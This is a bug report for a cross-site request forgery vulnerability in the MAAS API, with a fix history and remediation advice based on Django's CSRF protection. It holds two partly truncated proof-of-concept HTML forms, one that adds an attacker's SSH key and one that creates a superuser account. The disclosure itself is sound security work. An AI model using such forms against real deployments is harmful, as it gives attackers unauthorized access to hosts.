MAAS API vulnerable to CSRF attack
| Affects | Status | Importance | Assigned to | Milestone | |
|---|---|---|---|---|---|
| MAAS |
Fix Released
|
Critical
|
Blake Rouse | ||
| 1.5 |
Won't Fix
|
Undecided
|
Unassigned | ||
| 1.7 |
Won't Fix
|
Undecided
|
Unassigned | ||
| 1.9 |
Fix Released
|
Critical
|
Blake Rouse | ||
Bug Description
Because of the flexibility of the API, various actions could be performed as part of a CSRF attack. For
example, by enticing a logged in user to visit a page containing the following HTML, a remote attacker
could trick the user into adding an SSH key.
<html>
<body>
<form action="https:/
<input type="hidden" name="op" value="new" />
<input type="hidden" name="key" value="ssh-rsa AAAAB3NzaC1yc2E
eJygNMH2y2Tofnq
V5Bx94yi0jfMNir
xc3SkKOaWV/
kswXNwi8Z8qK9mY
<input type="submit" />
</form>
<script>
</script>
</body>
</html>
This could potentially give the attacker SSH access to hosts. Other simple attacks could include adding
oauth keys, uploading and deleting files, or setting configuration values – for example, changing the
HTTP proxy used by nodes or uploading custom commissioning scripts.
In MAAS version 1.5, more API actions have been implemented, and as a result several extra attacks
are possible. For example, new user accounts can be created via HTML such as:
<html>
<body>
<form action="http://
<input name="username" value="test" type="hidden">
<input name="email" <email address hidden>" type="hidden">
<input name="password" value="test" type="hidden">
<input name="is_superuser" value="1" type="hidden">
<input type="submit">
</form>
<script>
</script>
</body>
</html>
= Remediation =
Most of the MAAS application is protected against cross-site request forgery attacks using Django’s
built in anti-CSRF middleware. This validates requests by ensuring that a cryptographic nonce which is
included in a cookie also appears in HTTP requests which result in configuration changes. Netcraft
recommends that, if possible, when API requests are authenticated using Djano’s sessionid cookie,
the framework’s CSRF protection is also used.
CVE References
| Changed in maas: | |
| milestone: | none → 1.7.2 |
| Raphaël Badin (rvb) wrote | #1 |
| summary: |
- MAAS API vulnerable to CRSF attack + MAAS API vulnerable to CSRF attack |
| Changed in maas: | |
| status: | Triaged → In Progress |
| Marc Deslauriers (mdeslaur) wrote | #2 |
| Andreas Hasenack (ahasenack) wrote | #3 |
| Marc Deslauriers (mdeslaur) wrote | #4 |
| Marc Deslauriers (mdeslaur) wrote | #5 |
| Dean Henrichsmeyer (dean) wrote | #6 |
| Changed in maas: | |
| status: | Fix Committed → Fix Released |
| information type: | Private Security → Public Security |
To protect against CSRF, Django uses the double-submit cookie pattern: a cookie is set by Django during the first request and each form submission posts that same token (as a hidden field); the server validates each request by making sure the cookie has the same value as the submitted field. The protective measure lies in the fact that an attacker site cannot read the cookie and include it as request parameter.
Now, it should be easy to re-use this in the API: get the cookie when authenticating and pass it with each POST request.